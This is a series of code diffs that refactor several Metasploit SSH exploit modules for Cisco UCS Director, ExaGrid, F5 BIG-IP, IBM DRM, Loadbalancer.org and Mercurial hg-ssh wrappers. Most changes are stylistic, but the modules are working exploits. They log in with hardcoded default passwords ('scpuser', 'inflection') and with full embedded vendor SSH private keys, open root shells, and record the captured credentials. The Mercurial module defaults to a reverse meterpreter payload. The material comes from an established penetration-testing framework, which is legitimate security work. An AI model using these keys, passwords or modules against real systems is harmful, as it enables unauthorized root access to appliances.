+      update_info(
+        info,
+        'Name' => 'Cisco UCS Director default scpuser password',
+        'Description' => %q{
+          This module abuses a known default password on Cisco UCS Director. The 'scpuser'
+          has the password of 'scpuser', and allows an attacker to login to the virtual appliance
+          via SSH.
+          This module  has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
+          Note that Cisco also mentions in their advisory that their IMC Supervisor and
+          UCS Director Express are also affected by these vulnerabilities, but this module
+          was not tested with those products.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2019-1935' ],
           [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-ucs-rce.txt' ]
         ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread'
         },
-      'Payload'        =>
-        {
+        'Payload' => {
           'Compat' => {
-            'PayloadType'    => 'cmd_interact',
+            'PayloadType' => 'cmd_interact',
             'ConnectionType' => 'find'
           }
         },
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'Targets'        =>
-        [
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Targets' => [
           [ 'Cisco UCS Director < 6.7.2.0', {} ],
         ],
-      'Privileged'     => false,
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2019-08-21'
-    ))
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2019-08-21',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(22),
-        OptString.new('USERNAME', [true,  "Username to login with", 'scpuser']),
-        OptString.new('PASSWORD', [true,  "Password to login with", 'scpuser']),
+        OptString.new('USERNAME', [true, 'Username to login with', 'scpuser']),
+        OptString.new('PASSWORD', [true, 'Password to login with', 'scpuser']),
       ], self.class
     )
 
@@ -83,12 +86,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def do_login(user, pass)
     opts = ssh_client_defaults.merge({
-      :auth_methods    => ['password', 'keyboard-interactive'],
-      :port            => rport,
-      :password        => pass
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: rport,
+      password: pass
     })
 
-    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
     begin
       ssh = nil

--- a/modules/exploits/linux/ssh/cisco_ucs_scpuser.rb
+++ b/modules/exploits/linux/ssh/cisco_ucs_scpuser.rb
@@ -82,17 +82,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login(user, pass)
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       :auth_methods    => ['password', 'keyboard-interactive'],
       :port            => rport,
-      :use_agent       => false,
-      :config          => false,
-      :password        => pass,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :password        => pass
+    })
 
     opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
 

--- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb
+++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb
@@ -13,38 +13,46 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::SSH
 
   def initialize(info = {})
-    super(update_info(info, {
-      'Name'        => 'ExaGrid Known SSH Key and Default Password',
-      'Description' => %q{
-        ExaGrid ships a public/private key pair on their backup appliances to
-        allow passwordless authentication to other ExaGrid appliances.  Since
-        the private key is easily retrievable, an attacker can use it to gain
-        unauthorized remote access as root. Additionally, this module will
-        attempt to use the default password for root, 'inflection'.
-      },
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Privileged'  => true,
-      'Targets'     => [ [ "Universal", {} ] ],
-      'Payload'     =>
+    super(
+      update_info(
+        info,
         {
-          'Compat'  => {
-            'PayloadType'    => 'cmd_interact',
-            'ConnectionType' => 'find',
+          'Name' => 'ExaGrid Known SSH Key and Default Password',
+          'Description' => %q{
+            ExaGrid ships a public/private key pair on their backup appliances to
+            allow passwordless authentication to other ExaGrid appliances.  Since
+            the private key is easily retrievable, an attacker can use it to gain
+            unauthorized remote access as root. Additionally, this module will
+            attempt to use the default password for root, 'inflection'.
           },
-        },
-      'Author'      => ['egypt'],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          [ 'CVE', '2016-1560' ], # password
-          [ 'CVE', '2016-1561' ], # private key
-          [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ]
-        ],
-      'DisclosureDate' => '2016-04-07',
-      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
-      'DefaultTarget' => 0
-    }))
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Privileged' => true,
+          'Targets' => [ [ 'Universal', {} ] ],
+          'Payload' => {
+            'Compat' => {
+              'PayloadType' => 'cmd_interact',
+              'ConnectionType' => 'find'
+            }
+          },
+          'Author' => ['egypt'],
+          'License' => MSF_LICENSE,
+          'References' => [
+            [ 'CVE', '2016-1560' ], # password
+            [ 'CVE', '2016-1561' ], # private key
+            [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ]
+          ],
+          'DisclosureDate' => '2016-04-07',
+          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+          'DefaultTarget' => 0,
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => []
+          }
+        }
+      )
+    )
 
     register_options(
       [
@@ -60,13 +68,13 @@ class MetasploitModule < Msf::Exploit::Remote
         OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
       ]
     )
-
   end
 
   # helper methods that normally come from Tcp
   def rhost
     datastore['RHOST']
   end
+
   def rport
     datastore['RPORT']
   end
@@ -108,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # negatives due to weirdness with ssh sockets. We already know it's a shell
   # because auth succeeded by this point, so no need to do the check anyway.
   module TrustMeItsAShell
-    def _check_shell(*args)
+    def _check_shell(*_args)
       true
     end
   end
@@ -117,9 +125,9 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_instance.extend(TrustMeItsAShell)
 
     ssh_options = ssh_client_defaults.merge({
-      :auth_methods    => ['publickey'],
-      :key_data        => [ key_data ],
-      :port            => rport
+      auth_methods: ['publickey'],
+      key_data: [ key_data ],
+      port: rport
     })
     ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
@@ -134,28 +142,28 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def is_success?(conn,key_based)
+  def success?(conn, key_based)
     if conn
-      print_good "Successful login"
+      print_good 'Successful login'
       service_data = {
         address: rhost,
         port: rport,
         protocol: 'tcp',
         service_name: 'ssh',
-        workspace_id: myworkspace_id,
+        workspace_id: myworkspace_id
       }
       credential_data = {
         username: 'root',
-        private_type: ( key_based ? :ssh_key : :password ),
-        private_data: ( key_based ? key_data : 'inflection' ),
+        private_type: (key_based ? :ssh_key : :password),
+        private_data: (key_based ? key_data : 'inflection'),
         origin_type: :service,
-        module_fullname: fullname,
+        module_fullname: fullname
       }.merge(service_data)
 
       core = create_credential(credential_data)
       login_data = {
         core: core,
-        last_attempted: Time.now,
+        last_attempted: Time.now
       }.merge(service_data)
 
       create_credential_login(login_data)
@@ -168,22 +176,22 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def key_data
-    <<EOF
------BEGIN RSA PRIVATE KEY-----
-MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10
-hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa
-E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA
-GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ
-BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg
-AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y
-iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs
-Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj
-QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz
-ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG
-XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk
-86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y
-x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg==
------END RSA PRIVATE KEY-----
-EOF
+    <<~EOF
+      -----BEGIN RSA PRIVATE KEY-----
+      MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10
+      hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa
+      E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA
+      GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ
+      BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg
+      AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y
+      iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs
+      Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj
+      QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz
+      ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG
+      XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk
+      86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y
+      x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg==
+      -----END RSA PRIVATE KEY-----
+    EOF
   end
 end

--- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb
+++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb
@@ -115,18 +115,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     payload_instance.extend(TrustMeItsAShell)
-    factory = ssh_socket_factory
 
-    ssh_options = {
+    ssh_options = ssh_client_defaults.merge({
       :auth_methods    => ['publickey'],
-      :config          => false,
-      :use_agent       => false,
       :key_data        => [ key_data ],
-      :port            => rport,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :port            => rport
+    })
     ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
     conn = do_login(ssh_options)

--- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
+++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
@@ -17,36 +17,39 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'        => 'F5 BIG-IP SSH Private Key Exposure',
-        'Description' => %q(
+        'Name' => 'F5 BIG-IP SSH Private Key Exposure',
+        'Description' => %q{
           F5 ships a public/private key pair on BIG-IP appliances that allows
           passwordless authentication to any other BIG-IP box. Since the key is
           easily retrievable, an attacker can use it to gain unauthorized remote
           access as root.
-        ),
-        'Platform'    => 'unix',
-        'Arch'        => ARCH_CMD,
-        'Privileged'  => true,
-        'Targets'     => [ [ "Universal", {} ] ],
-        'Payload'     =>
-          {
-            'Compat' => {
-              'PayloadType'    => 'cmd_interact',
-              'ConnectionType' => 'find'
-            }
-          },
-        'Author'      => ['egypt'],
-        'License'     => MSF_LICENSE,
-        'References'  =>
-          [
-            [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ],
-            [ 'CVE', '2012-1493' ],
-            [ 'OSVDB', '82780' ],
-            [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ]
-          ],
+        },
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Privileged' => true,
+        'Targets' => [ [ 'Universal', {} ] ],
+        'Payload' => {
+          'Compat' => {
+            'PayloadType' => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+        'Author' => ['egypt'],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ],
+          [ 'CVE', '2012-1493' ],
+          [ 'OSVDB', '82780' ],
+          [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ]
+        ],
         'DisclosureDate' => '2012-06-11',
         'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
       )
     )
 
@@ -76,11 +79,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login(user)
-
     opt_hash = ssh_client_defaults.merge({
-      :auth_methods    => ['publickey'],
-      :port            => rport,
-      :key_data        => [ key_data ]
+      auth_methods: ['publickey'],
+      port: rport,
+      key_data: [ key_data ]
     })
 
     opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']
@@ -114,30 +116,30 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    conn = do_login("root")
+    conn = do_login('root')
     if conn
-      print_good "Successful login"
+      print_good 'Successful login'
       handler(conn.lsock)
     end
   end
 
   def key_data
-    <<EOF
------BEGIN RSA PRIVATE KEY-----
-MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
-UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
-OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
-gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
-8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
-7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
-2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
-37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
-RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
-rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
-uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
-Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
-LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
------END RSA PRIVATE KEY-----
-EOF
+    <<~EOF
+      -----BEGIN RSA PRIVATE KEY-----
+      MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
+      UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
+      OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
+      gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
+      8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
+      7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
+      2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
+      37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
+      RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
+      rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
+      uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
+      Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
+      LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
+      -----END RSA PRIVATE KEY-----
+    EOF
   end
 end

--- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
+++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::SSH
 
   def initialize(info = {})
     super(
@@ -75,18 +76,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login(user)
-    factory = Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies'])
 
-    opt_hash = {
+    opt_hash = ssh_client_defaults.merge({
       :auth_methods    => ['publickey'],
       :port            => rport,
-      :key_data        => [ key_data ],
-      :use_agent       => false,
-      :config          => false,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :key_data        => [ key_data ]
+    })
+
     opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']
 
     begin

--- a/modules/exploits/linux/ssh/ibm_drm_a3user.rb
+++ b/modules/exploits/linux/ssh/ibm_drm_a3user.rb
@@ -43,7 +43,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Privileged' => true,
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2020-04-21'
+        'DisclosureDate' => '2020-04-21',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
       )
     )
 

--- a/modules/exploits/linux/ssh/ibm_drm_a3user.rb
+++ b/modules/exploits/linux/ssh/ibm_drm_a3user.rb
@@ -83,17 +83,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login(user, pass)
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       auth_methods: ['password', 'keyboard-interactive'],
       port: rport,
-      use_agent: false,
-      config: false,
-      password: pass,
-      proxy: factory,
-      non_interactive: true,
-      verify_host_key: :never
-    }
+      password: pass
+    })
 
     opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 

--- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
+++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
@@ -69,17 +69,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login(user)
-    factory = ssh_socket_factory
-    opt_hash = {
+
+    opt_hash = ssh_client_defaults.merge({
       :auth_methods    => ['publickey'],
       :port            => rport,
-      :key_data        => [ key_data ],
-      :use_agent       => false,
-      :config          => false,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :key_data        => [ key_data ]
+    })
+    
     opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
     begin
       ssh_socket = nil

--- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
+++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
@@ -13,35 +13,43 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::SSH
 
   def initialize(info = {})
-    super(update_info(info, {
-      'Name'        => 'Loadbalancer.org Enterprise VA SSH Private Key Exposure',
-      'Description' => %q{
-        Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances
-        version 7.5.2 that allows passwordless authentication to any other LB Enterprise box.
-        Since the key is easily retrievable, an attacker can use it to gain unauthorized remote
-        access as root.
-      },
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Privileged'  => true,
-      'Targets'     => [ [ "Universal", {} ] ],
-      'Payload'     =>
+    super(
+      update_info(
+        info,
         {
-          'Compat'  => {
-            'PayloadType'    => 'cmd_interact',
-            'ConnectionType' => 'find',
+          'Name' => 'Loadbalancer.org Enterprise VA SSH Private Key Exposure',
+          'Description' => %q{
+            Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances
+            version 7.5.2 that allows passwordless authentication to any other LB Enterprise box.
+            Since the key is easily retrievable, an attacker can use it to gain unauthorized remote
+            access as root.
           },
-        },
-      'Author'      => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          ['PACKETSTORM', '125754']
-        ],
-      'DisclosureDate' => '2014-03-17',
-      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
-      'DefaultTarget' => 0
-    }))
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Privileged' => true,
+          'Targets' => [ [ 'Universal', {} ] ],
+          'Payload' => {
+            'Compat' => {
+              'PayloadType' => 'cmd_interact',
+              'ConnectionType' => 'find'
+            }
+          },
+          'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
+          'License' => MSF_LICENSE,
+          'References' => [
+            ['PACKETSTORM', '125754']
+          ],
+          'DisclosureDate' => '2014-03-17',
+          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+          'DefaultTarget' => 0,
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => []
+          }
+        }
+      )
+    )
 
     register_options(
       [
@@ -57,26 +65,25 @@ class MetasploitModule < Msf::Exploit::Remote
         OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
       ]
     )
-
   end
 
   # helper methods that normally come from Tcp
   def rhost
     datastore['RHOST']
   end
+
   def rport
     datastore['RPORT']
   end
 
   def do_login(user)
-
     opt_hash = ssh_client_defaults.merge({
-      :auth_methods    => ['publickey'],
-      :port            => rport,
-      :key_data        => [ key_data ]
+      auth_methods: ['publickey'],
+      port: rport,
+      key_data: [ key_data ]
     })
-    
-    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']
     begin
       ssh_socket = nil
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
@@ -111,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    conn = do_login("root")
+    conn = do_login('root')
     if conn
       print_good "#{rhost}:#{rport} - Successful login"
       handler(conn.lsock)
@@ -119,21 +126,19 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def key_data
-    <<EOF
------BEGIN DSA PRIVATE KEY-----
-MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
-Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd
-yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ
-rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+
-t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW
-cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY
-TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1
-MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl
-2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH
-SzmJVCWFyVuuANR2Bnc=
------END DSA PRIVATE KEY-----
-EOF
+    <<~EOF
+      -----BEGIN DSA PRIVATE KEY-----
+      MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
+      Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd
+      yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ
+      rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+
+      t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW
+      cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY
+      TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1
+      MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl
+      2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH
+      SzmJVCWFyVuuANR2Bnc=
+      -----END DSA PRIVATE KEY-----
+    EOF
   end
 end
-
-

--- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
+++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
@@ -1,4 +1,4 @@
-  ##
+##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
@@ -8,35 +8,40 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::SSH
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
-      'Description'    => %q{
-        This module takes advantage of custom hg-ssh wrapper implementations that don't
-        adequately validate parameters passed to the hg binary, allowing users to trigger a
-        Python Debugger session, which allows arbitrary Python code execution.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Mercurial Custom hg-ssh Wrapper Remote Code Exec',
+        'Description' => %q{
+          This module takes advantage of custom hg-ssh wrapper implementations that don't
+          adequately validate parameters passed to the hg binary, allowing users to trigger a
+          Python Debugger session, which allows arbitrary Python code execution.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'claudijd',
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2017-9462' ],
-          ['URL',   'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
+          ['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
         ],
-      'DefaultOptions' =>
-        {
-          'Payload' => 'python/meterpreter/reverse_tcp',
+        'DefaultOptions' => {
+          'Payload' => 'python/meterpreter/reverse_tcp'
         },
-      'Platform'       => ['python'],
-      'Arch'           => ARCH_PYTHON,
-      'Targets'        => [ ['Automatic', {}] ],
-      'Privileged'     => false,
-      'DisclosureDate' => '2017-04-18',
-      'DefaultTarget'  => 0
-    ))
+        'Platform' => ['python'],
+        'Arch' => ARCH_PYTHON,
+        'Targets' => [ ['Automatic', {}] ],
+        'Privileged' => false,
+        'DisclosureDate' => '2017-04-18',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -72,14 +77,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    
     ssh_options = ssh_client_defaults.merge({
-      :auth_methods    => ['publickey'],
-      :key_data        => [ ssh_priv_key ],
-      :port            => rport
+      auth_methods: ['publickey'],
